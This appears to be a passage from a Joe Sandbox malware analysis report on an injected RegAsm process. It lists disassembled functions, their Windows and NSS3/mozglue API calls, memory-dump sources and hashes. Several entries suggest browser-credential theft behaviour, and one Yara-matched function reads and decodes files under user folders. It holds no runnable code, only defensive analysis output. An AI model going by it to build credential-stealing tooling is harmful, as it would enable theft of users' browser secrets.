                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                • String ID:
                                                                                • API String ID: 1569127702-0
                                                                                • Opcode ID: a546a2fbc33990720c2764e4cf5dc02da6ab6217986608dd2b6a3abbe5930fb2
                                                                                • Instruction ID: 1b0b97a3a11ed5277aee360e77c24e11e7a79e5e6ca228f9511c4563aa7fecdf
                                                                                • Opcode Fuzzy Hash: a546a2fbc33990720c2764e4cf5dc02da6ab6217986608dd2b6a3abbe5930fb2
                                                                                • Instruction Fuzzy Hash: 745128B2E002169FEB208F6CCD8496EB779EF6A358F144929EC189B700E731ED4587D1
                                                                                Function 6C90CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_DoesMechanism.NSS3(?,00000132), ref: 6C90CE9E
                                                                                • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C90CEBB
                                                                                • PK11_DoesMechanism.NSS3(?,00001081), ref: 6C90CED8
                                                                                • PK11_DoesMechanism.NSS3(?,00000551), ref: 6C90CEF5
                                                                                • PK11_DoesMechanism.NSS3(?,00000651), ref: 6C90CF12
                                                                                • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C90CF2F
                                                                                • PK11_DoesMechanism.NSS3(?,00000121), ref: 6C90CF4C
                                                                                • PK11_DoesMechanism.NSS3(?,00000400), ref: 6C90CF69
                                                                                • PK11_DoesMechanism.NSS3(?,00000341), ref: 6C90CF86
                                                                                • PK11_DoesMechanism.NSS3(?,00000311), ref: 6C90CFA3
                                                                                • PK11_DoesMechanism.NSS3(?,00000301), ref: 6C90CFBC
                                                                                • PK11_DoesMechanism.NSS3(?,00000331), ref: 6C90CFD5
                                                                                • PK11_DoesMechanism.NSS3(?,00000101), ref: 6C90CFEE
                                                                                • PK11_DoesMechanism.NSS3(?,00000141), ref: 6C90D007
                                                                                • PK11_DoesMechanism.NSS3(?,00001008), ref: 6C90D021
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DoesK11_Mechanism
                                                                                • String ID:
                                                                                • API String ID: 622698949-0
                                                                                • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                • Instruction ID: 7bb3da3e5728b58834ff7f4c1c7a4d7c94680b7aa723d8f85b60197528c45f86
                                                                                • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                • Instruction Fuzzy Hash: 36312A62B73D1027EF09105AAC21B9E145E4F7631EF48003CF94AFA7C0F699DB1A12A9
                                                                                Function 6C91EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6C91EE0B
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C91EEE1
                                                                                  • Part of subcall function 6C911D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C911D7E
                                                                                  • Part of subcall function 6C911D50: EnterCriticalSection.KERNEL32(?), ref: 6C911D8E
                                                                                  • Part of subcall function 6C911D50: PR_Unlock.NSS3(?), ref: 6C911DD3
                                                                                • TlsGetValue.KERNEL32 ref: 6C91EE51
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C91EE65
                                                                                • PR_Unlock.NSS3(?), ref: 6C91EEA2
                                                                                • free.MOZGLUE(?), ref: 6C91EEBB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91EED0
                                                                                • PR_Unlock.NSS3(?), ref: 6C91EF48
                                                                                • free.MOZGLUE(?), ref: 6C91EF68
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91EF7D
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6C91EFA4
                                                                                • free.MOZGLUE(?), ref: 6C91EFDA
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C91F055
                                                                                • free.MOZGLUE(?), ref: 6C91F060
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                • String ID:
                                                                                • API String ID: 2524771861-0
                                                                                • Opcode ID: 659fe4bf99b0f3c6262d0c23db746bfcec0135b3faef7b17299b35e944e3c20b
                                                                                • Instruction ID: 8eb6d2729ba9329d2cbea276553d44a7fc724c2a817294360c686d2c828a0209
                                                                                • Opcode Fuzzy Hash: 659fe4bf99b0f3c6262d0c23db746bfcec0135b3faef7b17299b35e944e3c20b
                                                                                • Instruction Fuzzy Hash: 9A817271A04209ABEF01DF65DD46AEE7BB9BF19318F144024ED09A3F11E735E924CBA1
                                                                                Function 6C8E4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_SignatureLen.NSS3(?), ref: 6C8E4D80
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6C8E4D95
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6C8E4DF2
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8E4E2C
                                                                                • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C8E4E43
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6C8E4E58
                                                                                • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C8E4E85
                                                                                • DER_Encode_Util.NSS3(?,?,6CA305A4,00000000), ref: 6C8E4EA7
                                                                                • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C8E4F17
                                                                                • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C8E4F45
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8E4F62
                                                                                • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C8E4F7A
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8E4F89
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8E4FC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                • String ID:
                                                                                • API String ID: 2843999940-0
                                                                                • Opcode ID: eaa8e0ec0a4ca8b9a037ec59290703ee93687f0205e9093fd0ea4ebf6630a93b
                                                                                • Instruction ID: 1609d1709e8fff3c66fa64e2b336fa43e8a4bc8c8fb3ce6050ee5b288e9de146
                                                                                • Opcode Fuzzy Hash: eaa8e0ec0a4ca8b9a037ec59290703ee93687f0205e9093fd0ea4ebf6630a93b
                                                                                • Instruction Fuzzy Hash: 0A81A071908301AFE721CFA8D940B5AB7E4ABDA718F14892DF95CDB641E731E904CB92
                                                                                Function 6C80D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D4F0
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D4FC
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D52A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D530
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D53F
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D55F
                                                                                • free.MOZGLUE(00000000), ref: 6C80D585
                                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C80D5D3
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D5F9
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D605
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D652
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D658
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D667
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D6A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                • String ID:
                                                                                • API String ID: 2206442479-0
                                                                                • Opcode ID: dd7e96cb66919a424d3b06ccea0dbe15eb5a2379863544cc658cde001f7d22c9
                                                                                • Instruction ID: 30e6b8d21a72f0e3c66f88869608ecc3db833693ac561c953c238f461f91836f
                                                                                • Opcode Fuzzy Hash: dd7e96cb66919a424d3b06ccea0dbe15eb5a2379863544cc658cde001f7d22c9
                                                                                • Instruction Fuzzy Hash: B15180B1604705DFC724DF74C888A9ABBF4FF89318F109A2EE85A87751DB30A845CB91
                                                                                Function 6C916C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C91781D,00000000,6C90BE2C,?,6C916B1D,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C40
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C91781D,?,6C90BE2C,?), ref: 6C916C58
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C6F
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C916C84
                                                                                • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C916C96
                                                                                  • Part of subcall function 6C8C1240: TlsGetValue.KERNEL32(00000040,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1267
                                                                                  • Part of subcall function 6C8C1240: EnterCriticalSection.KERNEL32(?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C127C
                                                                                  • Part of subcall function 6C8C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1291
                                                                                  • Part of subcall function 6C8C1240: PR_Unlock.NSS3(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C12A0
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C916CAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                • API String ID: 4221828374-3736768024
                                                                                • Opcode ID: 6c1726b83bdc708ce52b3cfecbdd56e41be7c89a3d229a01b80358896828aed0
                                                                                • Instruction ID: c3f276e4419dee7875a9dcf591c8f2d4c02e8e122e6b6e86a255e005f75e5ac4
                                                                                • Opcode Fuzzy Hash: 6c1726b83bdc708ce52b3cfecbdd56e41be7c89a3d229a01b80358896828aed0
                                                                                • Instruction Fuzzy Hash: 7A0184B2B0A3162BF71027795D4AF26255DFF8119CF184431FF04E0D42EA96E51580B6
                                                                                Function 6C924E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetErrorText.NSS3(00000000,00000000,?,6C8E78F8), ref: 6C924E6D
                                                                                  • Part of subcall function 6C8C09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C8C06A2,00000000,?), ref: 6C8C09F8
                                                                                  • Part of subcall function 6C8C09E0: malloc.MOZGLUE(0000001F), ref: 6C8C0A18
                                                                                  • Part of subcall function 6C8C09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C8C0A33
                                                                                • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C8E78F8), ref: 6C924ED9
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C917703,?,00000000,00000000), ref: 6C915942
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C917703), ref: 6C915954
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C91596A
                                                                                  • Part of subcall function 6C915920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C915984
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C915999
                                                                                  • Part of subcall function 6C915920: free.MOZGLUE(00000000), ref: 6C9159BA
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C9159D3
                                                                                  • Part of subcall function 6C915920: free.MOZGLUE(00000000), ref: 6C9159F5
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C915A0A
                                                                                  • Part of subcall function 6C915920: free.MOZGLUE(00000000), ref: 6C915A2E
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C915A43
                                                                                • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924EB3
                                                                                  • Part of subcall function 6C924820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C924EB8,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C92484C
                                                                                  • Part of subcall function 6C924820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C924EB8,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C92486D
                                                                                  • Part of subcall function 6C924820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C924EB8,?), ref: 6C924884
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924EC0
                                                                                  • Part of subcall function 6C924470: TlsGetValue.KERNEL32(00000000,?,6C8E7296,00000000), ref: 6C924487
                                                                                  • Part of subcall function 6C924470: EnterCriticalSection.KERNEL32(?,?,?,6C8E7296,00000000), ref: 6C9244A0
                                                                                  • Part of subcall function 6C924470: PR_Unlock.NSS3(?,?,?,?,6C8E7296,00000000), ref: 6C9244BB
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F16
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F2E
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F40
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F6C
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F80
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F8F
                                                                                • PK11_UpdateSlotAttribute.NSS3(?,6C9FDCB0,00000000), ref: 6C924FFE
                                                                                • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C92501F
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C92506B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 560490210-0
                                                                                • Opcode ID: fffd285744d92dae2bc43255016edeb98e63a05115595d1e5c3d02b0467073fb
                                                                                • Instruction ID: 2a70ec1003e55135127c92094c9d5bba573cf515a68b80252ef7904da58a4225
                                                                                • Opcode Fuzzy Hash: fffd285744d92dae2bc43255016edeb98e63a05115595d1e5c3d02b0467073fb
                                                                                • Instruction Fuzzy Hash: 845138B1D102029BEB219F24EC01AAA77B4FF2531CF044635EC8A82B1AF735D565CBD2
                                                                                Function 00412DD7 Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00412DDC
                                                                                • memset.MSVCRT ref: 00412DFD
                                                                                • memset.MSVCRT ref: 00412E0B
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                • lstrcat.KERNEL32(?), ref: 00412E55
                                                                                • lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                • lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040C186: _EH_prolog.MSVCRT ref: 0040C18B
                                                                                  • Part of subcall function 0040C186: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                  • Part of subcall function 0040C186: memcmp.MSVCRT ref: 0040C21C
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410F98: GlobalAlloc.KERNEL32(00000000,/A,00000000,00000000,?,00412F0A,?,?), ref: 00410FA3
                                                                                • StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                • GlobalFree.KERNEL32(?), ref: 00412FE5
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                  • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                  • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00412F8B
                                                                                • StrCmpCA.SHLWAPI(?,00426576,?,?,?,?,000003E8), ref: 00412FA8
                                                                                • lstrcat.KERNEL32(?,?), ref: 00412FC1
                                                                                • lstrcat.KERNEL32(?,004268E0), ref: 00412FCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                • String ID:
                                                                                • API String ID: 174962345-0
                                                                                • Opcode ID: 54fda64b2706fe2e4b1d59de1c4ade093412862ff686ac036716463b3a26dbdf
                                                                                • Instruction ID: 16ae336f9ee2c04b565ca64b3f8ee01633a3d4ddb81cadfbdee95fe62696da0d
                                                                                • Opcode Fuzzy Hash: 54fda64b2706fe2e4b1d59de1c4ade093412862ff686ac036716463b3a26dbdf
                                                                                • Instruction Fuzzy Hash: BD613F72D0021DABDF11EBE1DC45DDEBBBDAF18304F00046AF505E3151EA7996988B65
                                                                                Function 6C8CACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 786543732-0
